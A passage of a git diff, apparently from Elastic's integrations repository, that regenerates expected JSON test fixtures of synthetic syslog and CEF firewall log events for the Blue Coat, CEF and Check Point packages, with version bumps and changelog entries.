: \u003c\u003camc.medium\u003e cmd starting isiuta", "event": { - "ingested": "2021-06-09T09:50:38.142481300Z" + "ingested": "2021-12-14T14:36:02.455710603Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd[5227]: dutp(psaquaea:taevita): pam_putenv: ameiusm", "event": { - "ingested": "2021-06-09T09:50:38.142485Z" + "ingested": 
"2021-12-14T14:36:02.455710950Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003colab.low\u003e Device elitse6672.internal.localdomain: mquisno", "event": { - "ingested": "2021-06-09T09:50:38.142488800Z" + "ingested": "2021-12-14T14:36:02.455711312Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[1859]: \u003c\u003ctasnulap.high\u003e Failed to exec umSe", "event": { - "ingested": "2021-06-09T09:50:38.142492600Z" + "ingested": "2021-12-14T14:36:02.455711671Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "shutdown[6110]: shutting down itau", "event": { - "ingested": "2021-06-09T09:50:38.142496400Z" + "ingested": "2021-12-14T14:36:02.455712065Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd[2415]: PAM lorsita more authentication failure; dolore", "event": { - "ingested": "2021-06-09T09:50:38.142500700Z" + "ingested": "2021-12-14T14:36:02.455712514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsyslogd: : Warning: tio", "event": { - "ingested": "2021-06-09T09:50:38.142504800Z" + "ingested": "2021-12-14T14:36:02.455712868Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[802]: \u003c\u003c-gnaaliqu.very-high\u003e velillu@::cteturad:10.18.204.87 : Processing a secure command...", "event": { - "ingested": "2021-06-09T09:50:38.142508700Z" + "ingested": "2021-12-14T14:36:02.455713228Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"heartbeat: : \u003c\u003creprehe.high\u003e connect: inimveni", "event": { - "ingested": "2021-06-09T09:50:38.142512400Z" + "ingested": "2021-12-14T14:36:02.455713587Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003clitani.low\u003e authd_close(): psumqu", "event": { - "ingested": "2021-06-09T09:50:38.142516200Z" + "ingested": "2021-12-14T14:36:02.455713943Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[2558]: \u003c\u003cicabo.high\u003e Failed to exec edquiac", "event": { - "ingested": "2021-06-09T09:50:38.142520100Z" + "ingested": "2021-12-14T14:36:02.455714316Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[4538]: Updated timestamp for job remips to uisaute", "event": { - "ingested": "2021-06-09T09:50:38.142523900Z" + "ingested": "2021-12-14T14:36:02.455714678Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[6837]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142527800Z" + "ingested": "2021-12-14T14:36:02.455715032Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pm[1493]: \u003c\u003cetdolor.high\u003e print_msg(), dic", "event": { - "ingested": "2021-06-09T09:50:38.142531800Z" + "ingested": "2021-12-14T14:36:02.455715389Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "configd: : \u003c\u003cavolupt.low\u003e Device \"itation4168.api.domain\" completed command(s) accept ;; CPL generated by Visual Policy Manager: isciv ;rroqu ; nofd ; dipisci", "event": { - 
"ingested": "2021-06-09T09:50:38.142535500Z" + "ingested": "2021-12-14T14:36:02.455715742Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "epmd: : epmd: invalid packet size (mquae)", "event": { - "ingested": "2021-06-09T09:50:38.142539300Z" + "ingested": "2021-12-14T14:36:02.455716102Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[429]: \u003c\u003ccorpori.very-high\u003e File reading failed", "event": { - "ingested": "2021-06-09T09:50:38.142543Z" + "ingested": "2021-12-14T14:36:02.455716760Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "shutdown[7595]: shutting down emqu", "event": { - "ingested": "2021-06-09T09:50:38.142547100Z" + "ingested": "2021-12-14T14:36:02.455717149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003cleumiur.low\u003e The HB command is accept", "event": { - "ingested": "2021-06-09T09:50:38.142550900Z" + "ingested": "2021-12-14T14:36:02.455717507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003cest.very-high\u003e authd_signal_handler(), isetquas", "event": { - "ingested": "2021-06-09T09:50:38.142554800Z" + "ingested": "2021-12-14T14:36:02.455717874Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003cpsaqua.medium\u003e authd_signal_handler(), gnaal", "event": { - "ingested": "2021-06-09T09:50:38.142558700Z" + "ingested": "2021-12-14T14:36:02.455718244Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with voluptas", "event": { - "ingested": "2021-06-09T09:50:38.142562800Z" + "ingested": "2021-12-14T14:36:02.455718603Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[627]: ntpd exiting on signal orin", "event": { - "ingested": "2021-06-09T09:50:38.142566500Z" + "ingested": "2021-12-14T14:36:02.455718958Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context ecillu: mmodoc", "event": { - "ingested": "2021-06-09T09:50:38.142570200Z" + "ingested": "2021-12-14T14:36:02.455719332Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[1140]: \u003c\u003c-abore.high\u003e modocon@ipsu3680.mail.test : Processing command: deny", "event": { - "ingested": "2021-06-09T09:50:38.142573900Z" + "ingested": "2021-12-14T14:36:02.455719689Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd: : bad username mquisn", "event": { - "ingested": "2021-06-09T09:50:38.142577700Z" + "ingested": "2021-12-14T14:36:02.455720048Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[1313]: ntpd derit-r orese", "event": { - "ingested": "2021-06-09T09:50:38.142581500Z" + "ingested": "2021-12-14T14:36:02.455720411Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003cleumiur.medium\u003e Device Communication Daemon online", "event": { - "ingested": "2021-06-09T09:50:38.142586500Z" + "ingested": "2021-12-14T14:36:02.455720774Z" + }, + "ecs": { + "version": "1.12.0" }, 
"tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsyslogd: : Warning: moles", "event": { - "ingested": "2021-06-09T09:50:38.142590500Z" + "ingested": "2021-12-14T14:36:02.455721131Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context olup: aco", "event": { - "ingested": "2021-06-09T09:50:38.142595400Z" + "ingested": "2021-12-14T14:36:02.455721616Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "shutdown[609]: shutting down ser", "event": { - "ingested": "2021-06-09T09:50:38.142599200Z" + "ingested": "2021-12-14T14:36:02.455721975Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[2991]: ntpd orinrep-r quiavol", "event": { - "ingested": "2021-06-09T09:50:38.142603100Z" + "ingested": "2021-12-14T14:36:02.455722331Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmd: : \u003c\u003cquin.medium\u003e inserted device id = sBonor2001.www5.example and serial number = amc into DB", "event": { - "ingested": "2021-06-09T09:50:38.142607Z" + "ingested": "2021-12-14T14:36:02.455722691Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003came.very-high\u003e ccd_handle_read_failure(), uid", "event": { - "ingested": "2021-06-09T09:50:38.142610700Z" + "ingested": "2021-12-14T14:36:02.455723051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cmd: : \u003c\u003cscivel.high\u003e cmd starting lmolesti", "event": { - "ingested": "2021-06-09T09:50:38.142614500Z" + "ingested": 
"2021-12-14T14:36:02.455723421Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmd: : \u003c\u003cemaperia.high\u003e inserted device id = ersp6625.internal.domain and serial number = seq into DB", "event": { - "ingested": "2021-06-09T09:50:38.142618Z" + "ingested": "2021-12-14T14:36:02.455723774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cmd: : \u003c\u003ctanimid.medium\u003e cmd starting uipexe", "event": { - "ingested": "2021-06-09T09:50:38.142621800Z" + "ingested": "2021-12-14T14:36:02.455724147Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003core.low\u003e The HB command is cancel", "event": { - "ingested": "2021-06-09T09:50:38.142625300Z" + "ingested": "2021-12-14T14:36:02.455724509Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[7360]: Normal exit tperspic", "event": { - "ingested": "2021-06-09T09:50:38.142629Z" + "ingested": "2021-12-14T14:36:02.455724869Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmd: : \u003c\u003cict.very-high\u003e Filter on (tetura) things. 
riosamni", "event": { - "ingested": "2021-06-09T09:50:38.142633200Z" + "ingested": "2021-12-14T14:36:02.455725226Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003cumetMa.low\u003e Device eleumiu2454.api.local: tat", "event": { - "ingested": "2021-06-09T09:50:38.142637800Z" + "ingested": "2021-12-14T14:36:02.455725583Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "schedulerd: : \u003c\u003clumqu.very-high\u003e System time changed, recomputing job run times.", "event": { - "ingested": "2021-06-09T09:50:38.142642100Z" + "ingested": "2021-12-14T14:36:02.455725945Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xinetd[3450]: Started working: aconsequ available services", "event": { - "ingested": "2021-06-09T09:50:38.142646300Z" + "ingested": "2021-12-14T14:36:02.455726317Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003csequat.high\u003e handle_authd unknown message =utemvel", "event": { - "ingested": "2021-06-09T09:50:38.142650400Z" + "ingested": "2021-12-14T14:36:02.455726672Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsyslogd: : Warning: iusm", "event": { - "ingested": "2021-06-09T09:50:38.142671300Z" + "ingested": "2021-12-14T14:36:02.455727034Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[16]: time reset stquido", "event": { - "ingested": "2021-06-09T09:50:38.142683500Z" + "ingested": "2021-12-14T14:36:02.455727396Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] 
}, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003caaliq.high\u003e Device olu5333.www.domain: orumSe", "event": { - "ingested": "2021-06-09T09:50:38.142689Z" + "ingested": "2021-12-14T14:36:02.455727747Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[80]: Normal exit ici", "event": { - "ingested": "2021-06-09T09:50:38.142693600Z" + "ingested": "2021-12-14T14:36:02.455728106Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[7612]: kernel time sync enabled nturmag", "event": { - "ingested": "2021-06-09T09:50:38.142698Z" + "ingested": "2021-12-14T14:36:02.455728457Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[7128]: eseruntm(lpaquiof:oloreeu): pam_putenv: olor", "event": { - "ingested": "2021-06-09T09:50:38.142702Z" + "ingested": "2021-12-14T14:36:02.455728811Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "schedulerd: : \u003c\u003cici.very-high\u003e Executing Job \"tquo\" execution iatnu", "event": { - "ingested": "2021-06-09T09:50:38.142705800Z" + "ingested": "2021-12-14T14:36:02.455729174Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with ntut", "event": { - "ingested": "2021-06-09T09:50:38.142709500Z" + "ingested": "2021-12-14T14:36:02.455729528Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "poller[7151]: \u003c\u003cess.high\u003e Querying content system for job results.", "event": { - "ingested": "2021-06-09T09:50:38.142713200Z" + "ingested": 
"2021-12-14T14:36:02.455729908Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[2314]: ntpd litanim-r rQuisaut", "event": { - "ingested": "2021-06-09T09:50:38.142716900Z" + "ingested": "2021-12-14T14:36:02.455730257Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003cmetco.high\u003e Processing command: block", "event": { - "ingested": "2021-06-09T09:50:38.142724Z" + "ingested": "2021-12-14T14:36:02.455730617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/bluecoat/manifest.yml b/packages/bluecoat/manifest.yml index 6d88e7bfbae..ce24025dc7f 100644 --- a/packages/bluecoat/manifest.yml +++ b/packages/bluecoat/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: bluecoat title: Blue Coat Director Logs -version: 0.6.0 +version: 0.6.1 description: Collect director logs from Blue Coat devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/cef/changelog.yml b/packages/cef/changelog.yml index b670afa0320..3eac66fae17 100644 --- a/packages/cef/changelog.yml +++ b/packages/cef/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.0" changes: - description: Change test IPs to the supported set for GeoIP diff --git a/packages/cef/data_stream/log/_dev/test/pipeline/test-cef.log-expected.json b/packages/cef/data_stream/log/_dev/test/pipeline/test-cef.log-expected.json index 132b742de72..234e95ccdf4 100644 --- a/packages/cef/data_stream/log/_dev/test/pipeline/test-cef.log-expected.json +++ b/packages/cef/data_stream/log/_dev/test/pipeline/test-cef.log-expected.json 
@@ -3,7 +3,7 @@ { "message": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Web request|low|eventId=3457 requestMethod=POST slat=38.915 slong=-77.511 proto=TCP sourceServiceName=httpd requestContext=https://www.google.com src=89.160.20.156 spt=33876 dst=192.168.10.1 dpt=443 request=https://www.example.com/cart", "event": { - "ingested": "2021-11-30T10:40:27.309239043Z" + "ingested": "2021-12-14T14:36:05.410075219Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|eventId=123 src=89.160.20.156 spt=33876 dst=89.160.20.156 dpt=443 duser=alice suser=bob destinationTranslatedAddress=10.10.10.10 fileHash=bc8bbe52f041fd17318f08a0f73762ce oldFileHash=a9796280592f86b74b27e370662d41eb", "event": { - "ingested": "2021-11-30T10:40:27.309247202Z" + "ingested": "2021-12-14T14:36:05.410078262Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|spriv=user dpriv=root", "event": { - "ingested": "2021-11-30T10:40:27.309249571Z" + "ingested": "2021-12-14T14:36:05.410078773Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "CEF:0|Elastic|Vaporware|1.0.0-alpha|18|Authentication|low|message=This event is padded with whitespace dst=192.168.1.2 src=192.168.3.4 ", "event": { - "ingested": "2021-11-30T10:40:27.309251218Z" + "ingested": "2021-12-14T14:36:05.410079187Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/cef/data_stream/log/_dev/test/pipeline/test-checkpoint.log-expected.json b/packages/cef/data_stream/log/_dev/test/pipeline/test-checkpoint.log-expected.json index 6533d7fa083..7c69ffe43c8 100644 --- a/packages/cef/data_stream/log/_dev/test/pipeline/test-checkpoint.log-expected.json +++ b/packages/cef/data_stream/log/_dev/test/pipeline/test-checkpoint.log-expected.json 
@@ -3,7 +3,7 @@ { "message": "CEF:0|Check Point|VPN-1 \u0026 FireWall-1|Check Point|Log|https|Unknown|act=Accept destinationTranslatedAddress=0.0.0.0 destinationTranslatedPort=0 deviceDirection=0 rt=1543270652000 sourceTranslatedAddress=192.168.103.254 sourceTranslatedPort=35398 spt=49363 dpt=443 cs2Label=Rule Name layer_name=Network layer_uuid=b406b732-2437-4848-9741-6eae1f5bf112 match_id=4 parent_rule=0 rule_action=Accept rule_uid=9e5e6e74-aa9a-4693-b9fe-53712dd27bea ifname=eth0 logid=0 loguid={0x5bfc70fc,0x1,0xfe65a8c0,0xc0000001} origin=192.168.101.254 originsicname=CN\\=R80,O\\=R80_M..6u6bdo sequencenum=1 version=5 dst=89.160.20.156 inzone=Internal nat_addtnl_rulenum=1 nat_rulenum=4 outzone=External product=VPN-1 \u0026 FireWall-1 proto=6 service_id=https src=192.168.101.100 cs5Label=Matched Category cs5=Business / Economy deviceCustomDate2=1508150533713 deviceCustomDate2Label=This field is made up", "event": { - "ingested": "2021-11-30T10:40:27.407370409Z" + "ingested": "2021-12-14T14:36:05.483183067Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "CEF:0|Check Point|VPN-1 \u0026 FireWall-1|Check Point|Log|https|Unknown|act=Bypass cn1Label=Email Recipients Number cs1Label=Email ID cs4Label=Email Control cs4=SMTP Policy Restrictions cs5Label=Email Session ID deviceDirection=0 msg=Encrypted session rt=1545211330000 spt=4001 dpt=25 fileHash=55f4a511e6f630a6b1319505414f114e7bcaf13d deviceCustomDate2=Apr 11 2020 10:42:13 deviceCustomDate2Label=Subscription expiration", "event": { - "ingested": "2021-11-30T10:40:27.407374562Z" + "ingested": "2021-12-14T14:36:05.483185855Z" }, "ecs": { "version": "1.12.0" 
@@ -27,7 +27,7 @@ { "message": "CEF:0|Check Point|VPN-1 \u0026 FireWall-1|Check Point|Log|https|Unknown|act=Drop cp_app_risk=High cp_severity=Very-High baseEventCount=12 deviceFacility=4 c6a2=fd00::555 c6a2Label=Source IPv6 Address c6a3=::1 c6a3Label=Destination IPv6 Address fileHash=580a783c1cb2b20613323f715d231a69 cn2=5 cn2Label=Duration in Seconds", "event": { - "ingested": "2021-11-30T10:40:27.407376023Z" + "ingested": "2021-12-14T14:36:05.483186326Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/cef/data_stream/log/_dev/test/pipeline/test-fp-ngfw-smc.log-expected.json b/packages/cef/data_stream/log/_dev/test/pipeline/test-fp-ngfw-smc.log-expected.json index c54e875d39a..233165d455b 100644 --- a/packages/cef/data_stream/log/_dev/test/pipeline/test-fp-ngfw-smc.log-expected.json +++ b/packages/cef/data_stream/log/_dev/test/pipeline/test-fp-ngfw-smc.log-expected.json @@ -3,7 +3,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|6.6.1|0|Generic|0|deviceExternalId=Master FW node 1 dvc=10.1.1.40 dvchost=10.1.1.40 msg=log server connection established deviceFacility=Logging System rt=Jan 17 2020 08:52:10", "event": { - "ingested": "2021-11-30T10:40:27.470992012Z" + "ingested": "2021-12-14T14:36:05.543866182Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|6.6.1|9005|FW_Communication-Communication-Error|0|deviceExternalId=Master FW node 1 dvc=10.1.1.40 dvchost=10.1.1.40 msg=Communication error: No route to host (-3, 5, 0) deviceFacility=Management rt=Jan 17 2020 08:52:09", "event": { - "ingested": "2021-11-30T10:40:27.470995241Z" + "ingested": "2021-12-14T14:36:05.543868410Z" }, "ecs": { "version": "1.12.0" 
@@ -27,7 +27,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|6.6.1|70018|Connection_Allowed|0|deviceExternalId=Master FW node 1 dvc=10.1.1.40 dvchost=10.1.1.40 src=10.37.205.252 dst=10.1.1.40 proto=1 deviceOutboundInterface=255 act=Allow msg=Referred connection: 10.1.1.40 -\u003e 10.37.133.35 frag\\=0x4000 TCP 47413-\u003e3020 deviceFacility=Packet Filtering rt=Jan 17 2020 08:52:09 app=Dest. Unreachable (Host Unreachable) cs1Label=RuleID cs1=2097157.1", "event": { - "ingested": "2021-11-30T10:40:27.470996518Z" + "ingested": "2021-12-14T14:36:05.543868822Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|70019|Connection_Discarded|0|deviceExternalId=Firewall-10 node 1 dvc=10.1.1.10 dvchost=10.1.1.10 src=172.16.1.1 dst=89.160.20.156 spt=68 dpt=67 proto=17 deviceOutboundInterface=255 deviceFacility=Packet Filtering rt=Jan 17 2020 08:56:21 app=BOOTPS (UDP) cs1Label=RuleID cs1=605.0", "event": { - "ingested": "2021-11-30T10:40:27.470997749Z" + "ingested": "2021-12-14T14:36:05.543869193Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|70020|Connection_Refused|0|deviceExternalId=Firewall-1 node 1 dvc=10.1.1.1 dvchost=10.1.1.1 src=172.16.1.1 dst=192.168.1.1 proto=1 deviceOutboundInterface=255 act=Refuse deviceFacility=Packet Filtering rt=Jan 17 2020 08:56:23 app=Echo Request (No Code) cs1Label=RuleID cs1=601.0", "event": { - "ingested": "2021-11-30T10:40:27.470998886Z" + "ingested": "2021-12-14T14:36:05.543869564Z" }, "ecs": { "version": "1.12.0" 
@@ -63,7 +63,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|70021|Connection_Closed|0|deviceExternalId=Firewall-6 node 1 dvc=10.1.1.6 dvchost=10.1.1.6 proto=6 deviceOutboundInterface=255 destinationServiceName=YouTube suser=alice deviceFacility=Packet Filtering rt=Jan 17 2020 08:56:20 app=TCP in=32526 out=27366", "event": { - "ingested": "2021-11-30T10:40:27.471000023Z" + "ingested": "2021-12-14T14:36:05.543873586Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|72714|ECA_Metadata_login|0|deviceExternalId=Firewall-3 node 1 dvc=10.1.1.3 dvchost=10.1.1.3 src=192.168.1.1 suser=bob deviceFacility=Endpoint Context Agent rt=Jan 17 2020 08:56:33", "event": { - "ingested": "2021-11-30T10:40:27.471001127Z" + "ingested": "2021-12-14T14:36:05.543874034Z" }, "ecs": { "version": "1.12.0" @@ -87,7 +87,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|72715|ECA_Metadata_logout|0|deviceExternalId=Firewall-10 node 1 dvc=10.1.1.10 dvchost=10.1.1.10 src=192.168.1.1 suser=bob deviceFacility=Endpoint Context Agent rt=Jan 17 2020 08:56:31", "event": { - "ingested": "2021-11-30T10:40:27.471002228Z" + "ingested": "2021-12-14T14:36:05.543874404Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|unknown|72716|ECA_Metadata_system_metadata_received|0|deviceExternalId=Firewall-8 node 1 dvc=10.1.1.8 dvchost=10.1.1.8 src=172.16.2.1 suser=alice deviceFacility=Endpoint Context Agent rt=Jan 17 2020 08:56:26", "event": { - "ingested": "2021-11-30T10:40:27.471003434Z" + "ingested": "2021-12-14T14:36:05.543874760Z" }, "ecs": { "version": "1.12.0" 
@@ -111,7 +111,7 @@ { "message": "CEF:0|FORCEPOINT|Firewall|6.6.1|78002|TLS connection state|0|deviceExternalId=Master FW node 1 dvc=10.1.1.40 dvchost=10.1.1.40 msg=TLS: Couldn't establish TLS connection (11, N/A) deviceFacility=Management rt=Jan 17 2020 08:52:09", "event": { - "ingested": "2021-11-30T10:40:27.471004573Z" + "ingested": "2021-12-14T14:36:05.543875120Z" }, "ecs": { "version": "1.12.0" @@ -123,7 +123,7 @@ { "message": "", "event": { - "ingested": "2021-11-30T10:40:27.471010758Z" + "ingested": "2021-12-14T14:36:05.543875476Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "", "event": { - "ingested": "2021-11-30T10:40:27.471012805Z" + "ingested": "2021-12-14T14:36:05.543876063Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "", "event": { - "ingested": "2021-11-30T10:40:27.471013991Z" + "ingested": "2021-12-14T14:36:05.543876448Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/cef/manifest.yml b/packages/cef/manifest.yml index 1ed7ca1c907..a13e644d1c7 100644 --- a/packages/cef/manifest.yml +++ b/packages/cef/manifest.yml @@ -1,6 +1,6 @@ name: cef title: CEF Logs -version: 1.3.0 +version: 1.3.1 release: ga description: Collect logs from CEF Logs with Elastic Agent. type: integration diff --git a/packages/checkpoint/changelog.yml b/packages/checkpoint/changelog.yml index 305780f527d..ca6a3389ff9 100644 --- a/packages/checkpoint/changelog.yml +++ b/packages/checkpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset 
